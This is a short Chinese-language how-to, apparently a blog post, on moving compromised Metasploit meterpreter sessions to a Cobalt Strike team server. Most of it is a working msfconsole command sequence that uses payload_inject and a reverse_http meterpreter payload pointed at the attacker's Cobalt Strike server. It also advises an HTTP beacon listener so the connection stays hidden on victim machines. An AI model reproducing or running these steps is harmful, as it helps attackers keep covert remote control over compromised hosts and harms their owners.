把MSF shell派生给Cobaltstrike3.6过程

原因:MSF带着走哪都比较繁重,无法集群工作,然鹅,解决这个问题的时候,发现msf上已经有meterpreter几十个,想要转走到集群的Cobaltstike上,只需要以下几步即可完成,Cobaltstrike 3.0+以后的集群是否方便,谁用谁知道。

1.登陆集群的Cobaltstirke,然后设置个beacon_http的监听。(至于为什么这个方式监听,隐蔽,要不然你监听后,到肉鸡上执行netstat -ano 看看)

2.进入有多个 meterpreter sessions的msf执行:

use exploit/windows/local/payload_inject                    启用攻击模块中windows分类下local分类的payload_inject 攻击器//

set PAYLOAD windows/meterpreter/reverse_http      //加载个通过http反弹的payload

set Disablepayloadhandler True

set LHOST xxx.xxx.xxx.xxx       //Cobaltstrike的公网服务器

set LPORT xxxx                                            //Cobaltstrike 监听的端口

set session 1                                            //Meterpreter session id

run                           //然后你就可以看到Cobaltstrike的上线了。


End